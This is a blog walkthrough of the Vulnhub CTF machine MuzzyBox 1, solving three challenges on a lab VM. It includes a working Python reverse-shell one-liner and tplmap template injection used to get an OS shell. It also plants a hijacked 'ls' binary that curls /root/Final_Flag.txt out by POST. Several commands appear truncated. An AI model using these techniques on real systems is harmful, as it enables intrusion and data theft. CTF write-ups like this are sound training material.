MuzzyBox: 1 Walkthrough Vulnhub CTF

MuzzyBox 1 Walkthrough Vulnhub CTF

Today, we’re sharing another Vulnhub CTF Walkthrough MuzzyBox 1 design by Muzzy This VM machine hosted on you can download here the machine link

Our First Step is Finding the target IP Address

MuzzyBox: 1 Walkthrough
Network Scanning

After finding the target IP address Nmap Aggressive scanning (-p- parameter ) all port scanning

nmap -A -p-
MuzzyBox: 1 Walkthrough

Nmap scanning we found port 80 & 3000 and 8989, 9633, 15000 open to HTTP Python server, and port 22 open to SSH as well.

open the target IP web browser for port 80 and have found a index.txt file we see the file three challenges
Challenge 1:
Washington State University has built an online library for its students. Only "Principal" is "Authorized". Can you able to bypass their logic for the flag??
Link: http://{IP}:3000/
Link: http://{IP}:9633/idcard.png

Our First challenge is bypassing the Washington State University idcard database

We can see the id card for upload and we see the author Note Don’t upload the file directly, edit with your name and upload its the screenshot.

Now Downloading the idcard our localhost

curl --output idcard.png
MuzzyBox: 1 Walkthrough

Now edit the png image file I am using windows inbuilt tool paint we already see the note index.txt Only “Principal” is “Authorized” Washington State University

after editing the again upload the file and our file successfully upload and we found our first Challenge
Challenge 2:
After the data breach University has developed the new website, but somehow it is still under maintenance. Can you able to list the current directory and read the flag file.
Link: http://{IP}:8989/

opening the URL web browser and we already see the python debugger and I click the console and new popup window is asking console password we already found the password our first challenge

I write a simple python code for listing the directory and our code is working

import os

we need to Starting our natcat listener any port number

python socket reverse payload

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")
MuzzyBox: 1 Walkthrough

nc -lvp 4545
MuzzyBox: 1 Walkthrough

reading our second Flag

cat |more
MuzzyBox: 1 Walkthrough
Challenge 3:
After system compromise root user is auditing the webserver files and directories by using "bash ls" and "sudo ls" commands. Can you able to get the /root/Final_Flag.txt file using the Out-of-Band technique ??
Link: http://{IP}:15000/page?name=muzzy

our target is vulnerable Server-Side Template Injection After a search we found an Exploitation Tool Github
MuzzyBox: 1 Walkthrough
Server-Side Template Injection Download Tool

Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.

./ -u'' --os-shell
MuzzyBox: 1 Walkthrough
ls -l ssti
cat ssti/no_flag.txt

login ssh connection with nsctf username and password iamnsce

ssh [email protected]

ls -lsa command to we see /usr/local/sbin directory user nsctf our current user nsctf edit any file sbin directory we already see our third Challenge 3 Can you able to get the /root/Final_Flag.txt file using the Out-of-Band technique ??

ls -lsa /usr/local/sbin

again start listening natcat for http post request

nc -lvp 4545

editing the ls command with nano editor and creating a post request with the curl command

nano /usr/local/sbin/ls

curl -i -X POST "" --data "@/root/Final_Flag.txt"

we found our Final Flag

Five86 2 Walkthrough read

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →